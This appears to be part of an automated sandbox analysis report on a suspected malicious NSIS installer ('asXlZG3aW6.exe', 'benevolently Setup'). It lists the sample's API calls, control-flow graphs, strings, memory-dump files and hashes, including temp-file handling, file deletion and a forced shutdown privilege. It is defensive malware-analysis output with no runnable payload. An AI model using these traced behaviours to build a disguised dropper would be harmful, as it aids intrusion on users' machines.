                                                                                                                                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040328B
                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403292
                                                                                                                                                                                    • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032AE
                                                                                                                                                                                    • GetCommandLineA.KERNEL32(benevolently Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032C3
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\asXlZG3aW6.exe",00000000,?,00000006,00000008,0000000A), ref: 004032D6
                                                                                                                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\asXlZG3aW6.exe",00000020,?,00000006,00000008,0000000A), ref: 00403301
                                                                                                                                                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033FE
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040340F
                                                                                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040341B
                                                                                                                                                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040342F
                                                                                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403437
                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403448
                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403450
                                                                                                                                                                                    • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403464
                                                                                                                                                                                      • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                                                                                                                                                                                      • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                                                                                                                                                                                      • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,benevolently Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                                                                                                                                                                                      • Part of subcall function 004037B5: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243,1033,benevolently Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,benevolently Setup: Installing,00000000,00000002,761F3410), ref: 004038A5
                                                                                                                                                                                      • Part of subcall function 004037B5: lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
                                                                                                                                                                                      • Part of subcall function 004037B5: GetFileAttributesA.KERNEL32(Call), ref: 004038C3
                                                                                                                                                                                      • Part of subcall function 004037B5: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243), ref: 0040390C
                                                                                                                                                                                      • Part of subcall function 004037B5: RegisterClassA.USER32(0042EBA0), ref: 00403949
                                                                                                                                                                                      • Part of subcall function 004036DB: CloseHandle.KERNEL32(000002C0,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6
                                                                                                                                                                                    • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403512
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403533
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403650
                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403657
                                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040366F
                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040368E
                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004036B2
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004036D5
                                                                                                                                                                                      • Part of subcall function 00405681: MessageBoxIndirectA.USER32(0040A218), ref: 004056DC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$ExitFileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                                                                    • String ID: "$"C:\Users\user\Desktop\asXlZG3aW6.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243$C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes$C:\Users\user\Desktop$C:\Users\user\Desktop\asXlZG3aW6.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K v$benevolently Setup$~nsu
                                                                                                                                                                                    • API String ID: 3855923921-3335253828
                                                                                                                                                                                    • Opcode ID: a62ce931ca2efa7a527a2a800e7e0040844f4c2c3ebfe2fb719c727999237710
                                                                                                                                                                                    • Instruction ID: 41c275c355797b12fd9b138c60a2ad170ddd3a1f93bd6a9867a2704463122372
                                                                                                                                                                                    • Opcode Fuzzy Hash: a62ce931ca2efa7a527a2a800e7e0040844f4c2c3ebfe2fb719c727999237710
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DC1E470604741AAD7216F759E49B2F3EACAF45706F44053FF581B61E2CB7C8A098B2E
                                                                                                                                                                                    Function 004051CA Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 134 4051ca-4051e6 135 405375-40537b 134->135 136 4051ec-4052b3 GetDlgItem * 3 call 40405b call 40492a GetClientRect GetSystemMetrics SendMessageA * 2 134->136 138 4053a5-4053b1 135->138 139 40537d-40539f GetDlgItem CreateThread CloseHandle 135->139 158 4052d1-4052d4 136->158 159 4052b5-4052cf SendMessageA * 2 136->159 141 4053d3-4053d9 138->141 142 4053b3-4053b9 138->142 139->138 143 4053db-4053e1 141->143 144 40542e-405431 141->144 146 4053f4-4053fb call 40408d 142->146 147 4053bb-4053ce ShowWindow * 2 call 40405b 142->147 148 4053e3-4053ef call 403fff 143->148 149 405407-405417 ShowWindow 143->149 144->146 152 405433-405439 144->152 155 405400-405404 146->155 147->141 148->146 156 405427-405429 call 403fff 149->156 157 405419-405422 call 40508c 149->157 152->146 160 40543b-40544e SendMessageA 152->160 156->144 157->156 163 4052e4-4052fb call 404026 158->163 164 4052d6-4052e2 SendMessageA 158->164 159->158 165 405454-405480 CreatePopupMenu call 405f87 AppendMenuA 160->165 166 40554b-40554d 160->166 173 405331-405352 GetDlgItem SendMessageA 163->173 174 4052fd-405311 ShowWindow 163->174 164->163 171 405482-405492 GetWindowRect 165->171 172 405495-4054ab TrackPopupMenu 165->172 166->155 171->172 172->166 175 4054b1-4054cb 172->175 173->166 178 405358-405370 SendMessageA * 2 173->178 176 405320 174->176 177 405313-40531e ShowWindow 174->177 179 4054d0-4054eb SendMessageA 175->179 180 405326-40532c call 40405b 176->180 177->180 178->166 179->179 181 4054ed-40550d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->173 183 40550f-40552f SendMessageA 181->183 183->183 184 405531-405545 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->166
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405229
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405238
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405275
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 0040527C
                                                                                                                                                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040529D
                                                                                                                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052AE
                                                                                                                                                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C1
                                                                                                                                                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052CF
                                                                                                                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E2
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405304
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405339
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405349
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405362
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040536E
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405247
                                                                                                                                                                                      • Part of subcall function 0040405B: SendMessageA.USER32(00000028,?,00000001,00403E8B), ref: 00404069
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040538A
                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000515E,00000000), ref: 00405398
                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0040539F
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004053C2
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004053C9
                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040540F
                                                                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405443
                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405454
                                                                                                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405469
                                                                                                                                                                                    • GetWindowRect.USER32(?,000000FF), ref: 00405489
                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A2
                                                                                                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054DE
                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 004054EE
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004054F4
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 004054FD
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405507
                                                                                                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040551B
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405534
                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 0040553F
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00405545
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • benevolently Setup: Installing, xrefs: 004054BA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                    • String ID: benevolently Setup: Installing
                                                                                                                                                                                    • API String ID: 590372296-470378788
                                                                                                                                                                                    • Opcode ID: a43d3a3d4153c9e144370ebfb7e1485c24af32df1aebf0fefb0dd59f9748b4bf
                                                                                                                                                                                    • Instruction ID: ba98567820032f63b871bd6861c5d6e43a3521a54ecc658c1b1e5281d96d67ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: a43d3a3d4153c9e144370ebfb7e1485c24af32df1aebf0fefb0dd59f9748b4bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6A14971900608BFDF11AF61DE89AAF7F79EB04354F40403AFA41B61A0CB755E519F68
                                                                                                                                                                                    Function 0040572D Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 493 40572d-405753 call 4059eb 496 405755-405767 DeleteFileA 493->496 497 40576c-405773 493->497 498 4058f6-4058fa 496->498 499 405775-405777 497->499 500 405786-405796 call 405f65 497->500 501 4058a4-4058a9 499->501 502 40577d-405780 499->502 506 4057a5-4057a6 call 405944 500->506 507 405798-4057a3 lstrcatA 500->507 501->498 505 4058ab-4058ae 501->505 502->500 502->501 508 4058b0-4058b6 505->508 509 4058b8-4058c0 call 406268 505->509 511 4057ab-4057ae 506->511 507->511 508->498 509->498 516 4058c2-4058d6 call 4058fd call 4056e5 509->516 514 4057b0-4057b7 511->514 515 4057b9-4057bf lstrcatA 511->515 514->515 517 4057c4-4057e2 lstrlenA FindFirstFileA 514->517 515->517 532 4058d8-4058db 516->532 533 4058ee-4058f1 call 40508c 516->533 519 4057e8-4057ff call 405928 517->519 520 40589a-40589e 517->520 526 405801-405805 519->526 527 40580a-40580d 519->527 520->501 522 4058a0 520->522 522->501 526->527 529 405807 526->529 530 405820-40582e call 405f65 527->530 531 40580f-405814 527->531 529->527 543 405830-405838 530->543 544 405845-405850 call 4056e5 530->544 534 405816-405818 531->534 535 405879-40588b FindNextFileA 531->535 532->508 537 4058dd-4058ec call 40508c call 405d44 532->537 533->498 534->530 539 40581a-40581e 534->539 535->519 541 405891-405894 FindClose 535->541 537->498 539->530 539->535 541->520 543->535 546 40583a-405843 call 40572d 543->546 552 405871-405874 call 40508c 544->552 553 405852-405855 544->553 546->535 552->535 555 405857-405867 call 40508c call 405d44 553->555 556 405869-40586f 553->556 555->535 556->535
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileA.KERNELBASE(?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405756
                                                                                                                                                                                    • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040579E
                                                                                                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057BF
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057C5
                                                                                                                                                                                    • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D6
                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405883
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405894
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • \*.*, xrefs: 00405798
                                                                                                                                                                                    • "C:\Users\user\Desktop\asXlZG3aW6.exe", xrefs: 0040572D
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040573A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\asXlZG3aW6.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                    • API String ID: 2035342205-2004890466
                                                                                                                                                                                    • Opcode ID: a11e03e59e5fd35a7b3b0442a482093daeb4251b1d727e15f9c9cc7460ea2170
                                                                                                                                                                                    • Instruction ID: 2a0351abb2716448ee460da7bfccfa5d3c7c3698b554042fcfc8e424752a7a40
                                                                                                                                                                                    • Opcode Fuzzy Hash: a11e03e59e5fd35a7b3b0442a482093daeb4251b1d727e15f9c9cc7460ea2170
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2551B132900A04AAEF217B268C45FBF7A78DF42754F14817BF841B61D1D73C8952DEA9
                                                                                                                                                                                    Function 00406268 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(761F3410,0042C0C0,0042BC78,00405A2E,0042BC78,0042BC78,00000000,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\), ref: 00406273
                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 0040627F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                    • Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                                                                                                                                                                    • Instruction ID: e0279db6a2f9a876ecb4b02bc738002a428a13ad585e0dc9357aaf1afb57e826
                                                                                                                                                                                    • Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DD012365060209FC25027786D0C85B7A589F053317118B7FF8AAF21E0C7348CA386DC
                                                                                                                                                                                    Function 00403B52 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 185 403b52-403b64 186 403ca5-403cb4 185->186 187 403b6a-403b70 185->187 189 403d03-403d18 186->189 190 403cb6-403cfe GetDlgItem * 2 call 404026 SetClassLongA call 40140b 186->190 187->186 188 403b76-403b7f 187->188 191 403b81-403b8e SetWindowPos 188->191 192 403b94-403b97 188->192 194 403d58-403d5d call 404072 189->194 195 403d1a-403d1d 189->195 190->189 191->192 197 403bb1-403bb7 192->197 198 403b99-403bab ShowWindow 192->198 203 403d62-403d7d 194->203 200 403d50-403d52 195->200 201 403d1f-403d2a call 401389 195->201 204 403bd3-403bd6 197->204 205 403bb9-403bce DestroyWindow 197->205 198->197 200->194 202 403ff3 200->202 201->200 222 403d2c-403d4b SendMessageA 201->222 210 403ff5-403ffc 202->210 208 403d86-403d8c 203->208 209 403d7f-403d81 call 40140b 203->209 213 403bd8-403be4 SetWindowLongA 204->213 214 403be9-403bef 204->214 211 403fd0-403fd6 205->211 218 403fb1-403fca DestroyWindow EndDialog 208->218 219 403d92-403d9d 208->219 209->208 211->202 217 403fd8-403fde 211->217 213->210 220 403c92-403ca0 call 40408d 214->220 221 403bf5-403c06 GetDlgItem 214->221 217->202 224 403fe0-403fe9 ShowWindow 217->224 218->211 219->218 225 403da3-403df0 call 405f87 call 404026 * 3 GetDlgItem 219->225 220->210 226 403c25-403c28 221->226 227 403c08-403c1f SendMessageA IsWindowEnabled 221->227 222->210 224->202 255 403df2-403df7 225->255 256 403dfa-403e36 ShowWindow KiUserCallbackDispatcher call 404048 EnableWindow 225->256 230 403c2a-403c2b 226->230 231 403c2d-403c30 226->231 227->202 227->226 232 403c5b-403c60 call 403fff 230->232 233 403c32-403c38 231->233 234 403c3e-403c43 231->234 232->220 236 403c79-403c8c SendMessageA 233->236 237 403c3a-403c3c 233->237 234->236 238 403c45-403c4b 234->238 236->220 237->232 241 403c62-403c6b call 40140b 238->241 242 403c4d-403c53 call 40140b 238->242 241->220 252 403c6d-403c77 241->252 251 403c59 242->251 251->232 252->251 255->256 259 403e38-403e39 256->259 260 403e3b 256->260 261 403e3d-403e6b GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403e80 261->262 263 403e6d-403e7e SendMessageA 261->263 264 403e86-403ec0 call 40405b call 403b33 call 405f65 lstrlenA call 405f87 SetWindowTextA call 401389 262->264 263->264 264->203 275 403ec6-403ec8 264->275 275->203 276 403ece-403ed2 275->276 277 403ef1-403f05 DestroyWindow 276->277 278 403ed4-403eda 276->278 277->211 280 403f0b-403f38 CreateDialogParamA 277->280 278->202 279 403ee0-403ee6 278->279 279->203 281 403eec 279->281 280->211 282 403f3e-403f95 call 404026 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->202 282->202 287 403f97-403faa ShowWindow call 404072 282->287 289 403faf 287->289 289->211
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8E
                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00403BAB
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00403BBF
                                                                                                                                                                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BDB
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403BFC
                                                                                                                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C10
                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403C17
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403CC5
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403CCF
                                                                                                                                                                                    • SetClassLongA.USER32(?,000000F2,?), ref: 00403CE9
                                                                                                                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D3A
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403DE0
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403E01
                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E13
                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403E2E
                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E44
                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403E4B
                                                                                                                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E63
                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E76
                                                                                                                                                                                    • lstrlenA.KERNEL32(benevolently Setup: Installing,?,benevolently Setup: Installing,00000000), ref: 00403EA0
                                                                                                                                                                                    • SetWindowTextA.USER32(?,benevolently Setup: Installing), ref: 00403EAF
                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00403FE3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
